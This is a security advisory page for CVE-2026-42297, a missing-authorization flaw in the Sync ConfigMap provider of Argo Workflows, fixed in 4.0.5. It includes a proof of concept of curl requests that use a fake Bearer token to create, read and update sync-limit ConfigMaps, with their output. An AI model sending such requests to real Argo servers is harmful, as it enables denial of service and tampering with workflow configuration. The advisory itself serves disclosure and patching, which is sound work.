GHSA-XCHC-CQWG-G76Q

Vulnerability from github – Published: 2026-05-04 20:00 – Updated: 2026-05-13 13:39
VLAI?
Summary
Argo has Missing Authorization in its Sync ConfigMap Provider
Details

Summary

The Sync Service's ConfigMap-backed provider (server/sync/sync_cm.go) performs zero authorization checks on all CRUD operations (create, read, update, delete). Any authenticated user — including those using fake Bearer tokens — can create, read, update, and delete Kubernetes ConfigMaps containing synchronization limits.

Details

The ConfigMap-backed provider (server/sync/sync_cm.go) has no auth.CanI checks:

// sync_cm.go — UNPROTECTED
func (s *configMapSyncProvider) createSyncLimit(ctx context.Context, req *syncpkg.CreateSyncLimitRequest) {
    // NO auth.CanI check
    kubeClient := auth.GetKubeClient(ctx)
    configmapGetter := kubeClient.CoreV1().ConfigMaps(req.Namespace)
    // ... directly creates/updates ConfigMaps
}
  • server/sync/sync_cm.go — lines 23-155
  • All four SyncService endpoints: CreateSyncLimit, GetSyncLimit, UpdateSyncLimit, DeleteSyncLimit

PoC

Prerequisites

  • Argo Server running with --auth-mode=server
  • Port-forward: kubectl port-forward -n argo svc/argo-server 2746:2746

Step 1: Create Sync Limit (Fake Token)

curl -sk -X POST "https://localhost:2746/api/v1/sync/default" \
  -H "Authorization: Bearer fake-token" \
  -H "Content-Type: application/json" \
  -d '{"type": 0, "namespace": "default", "cmName": "test-sync", "key": "test-key", "limit": 5}'

Result: {"namespace":"default","cmName":"test-sync","key":"test-key","limit":5}

Verify ConfigMap was created in Kubernetes:

kubectl get configmap test-sync -n default

NAME        DATA   AGE
test-sync   1      74s

Step 2: Read Sync Limit (Fake Token)

curl -sk "https://localhost:2746/api/v1/sync/default/test-key?type=0&cmName=test-sync" \
  -H "Authorization: Bearer fake-token"

Result: {"namespace":"default","cmName":"test-sync","key":"test-key","limit":5}

Step 3: Update Sync Limit (Fake Token)

curl -sk -X PUT "https://localhost:2746/api/v1/sync/default/test-key" \
  -H "Authorization: Bearer fake-token" \
  -H "Content-Type: application/json" \
  -d '{"type": 0, "namespace": "default", "cmName": "test-sync", "key": "test-key", "limit": 999}'

Result: {"namespace":"default","cmName":"test-sync","key":"test-key","limit":999}

Verify the ConfigMap was actually modified:

kubectl get configmap test-sync -n default -o jsonpath='{.data.test-key}'

999

Impact

An attacker with network access to the Argo Server can:

  1. Denial of Service — Set sync limits to 0 or 1, blocking all parallel workflow execution
  2. Workflow Disruption — Modify existing sync limits to break running workflows
  3. Information Disclosure — Read ConfigMap data that may contain sensitive configuration
  4. Arbitrary ConfigMap Manipulation — Create/delete ConfigMaps in any namespace accessible to the server's service account

Related CVEs

  • CVE-2026-28229 (GHSA-56px-hm34-xqj5): Unauthorized access to WorkflowTemplate endpoints — same root cause (missing auth.CanI check)
  • CVE-2024-53862 (GHSA-h36c-m3rf-34h9): Archived workflow auth bypass — same pattern
Severity ?
8.5 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:H/SA:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-workflows/v4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42297"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T20:00:18Z",
    "nvd_published_at": "2026-05-09T04:16:25Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe Sync Service\u0027s ConfigMap-backed provider (`server/sync/sync_cm.go`) performs **zero authorization checks** on all CRUD operations (create, read, update, delete). Any authenticated user \u2014 including those using fake Bearer tokens \u2014 can create, read, update, and delete Kubernetes ConfigMaps containing synchronization limits.\n\n### Details\nThe ConfigMap-backed provider (`server/sync/sync_cm.go`) has no `auth.CanI` checks:\n\n```go\n// sync_cm.go \u2014 UNPROTECTED\nfunc (s *configMapSyncProvider) createSyncLimit(ctx context.Context, req *syncpkg.CreateSyncLimitRequest) {\n    // NO auth.CanI check\n    kubeClient := auth.GetKubeClient(ctx)\n    configmapGetter := kubeClient.CoreV1().ConfigMaps(req.Namespace)\n    // ... directly creates/updates ConfigMaps\n}\n```\n- `server/sync/sync_cm.go` \u2014 lines 23-155\n- All four SyncService endpoints: `CreateSyncLimit`, `GetSyncLimit`, `UpdateSyncLimit`, `DeleteSyncLimit`\n\n### PoC\n### Prerequisites\n\n- Argo Server running with `--auth-mode=server`\n- Port-forward: `kubectl port-forward -n argo svc/argo-server 2746:2746`\n\n### Step 1: Create Sync Limit (Fake Token)\n\n```bash\ncurl -sk -X POST \"https://localhost:2746/api/v1/sync/default\" \\\n  -H \"Authorization: Bearer fake-token\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"type\": 0, \"namespace\": \"default\", \"cmName\": \"test-sync\", \"key\": \"test-key\", \"limit\": 5}\u0027\n```\n\n**Result:** `{\"namespace\":\"default\",\"cmName\":\"test-sync\",\"key\":\"test-key\",\"limit\":5}`\n\nVerify ConfigMap was created in Kubernetes:\n\n```bash\nkubectl get configmap test-sync -n default\n```\n\n```\nNAME        DATA   AGE\ntest-sync   1      74s\n```\n\n### Step 2: Read Sync Limit (Fake Token)\n\n```bash\ncurl -sk \"https://localhost:2746/api/v1/sync/default/test-key?type=0\u0026cmName=test-sync\" \\\n  -H \"Authorization: Bearer fake-token\"\n```\n\n**Result:** `{\"namespace\":\"default\",\"cmName\":\"test-sync\",\"key\":\"test-key\",\"limit\":5}`\n\n### Step 3: Update Sync Limit (Fake Token)\n\n```bash\ncurl -sk -X PUT \"https://localhost:2746/api/v1/sync/default/test-key\" \\\n  -H \"Authorization: Bearer fake-token\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"type\": 0, \"namespace\": \"default\", \"cmName\": \"test-sync\", \"key\": \"test-key\", \"limit\": 999}\u0027\n```\n\n**Result:** `{\"namespace\":\"default\",\"cmName\":\"test-sync\",\"key\":\"test-key\",\"limit\":999}`\n\nVerify the ConfigMap was actually modified:\n\n```bash\nkubectl get configmap test-sync -n default -o jsonpath=\u0027{.data.test-key}\u0027\n```\n\n```\n999\n```\n\n### Impact\nAn attacker with network access to the Argo Server can:\n\n1. **Denial of Service** \u2014 Set sync limits to `0` or `1`, blocking all parallel workflow execution\n2. **Workflow Disruption** \u2014 Modify existing sync limits to break running workflows\n3. **Information Disclosure** \u2014 Read ConfigMap data that may contain sensitive configuration\n4. **Arbitrary ConfigMap Manipulation** \u2014 Create/delete ConfigMaps in any namespace accessible to the server\u0027s service account\n\n## Related CVEs\n\n- **CVE-2026-28229** (GHSA-56px-hm34-xqj5): Unauthorized access to WorkflowTemplate endpoints \u2014 same root cause (missing `auth.CanI` check)\n- **CVE-2024-53862** (GHSA-h36c-m3rf-34h9): Archived workflow auth bypass \u2014 same pattern",
  "id": "GHSA-xchc-cqwg-g76q",
  "modified": "2026-05-13T13:39:05Z",
  "published": "2026-05-04T20:00:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xchc-cqwg-g76q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42297"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/commit/09fff05e0830c14a5e36cc40597ad84881db1ab6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-workflows"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Argo has Missing Authorization in its Sync ConfigMap Provider"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.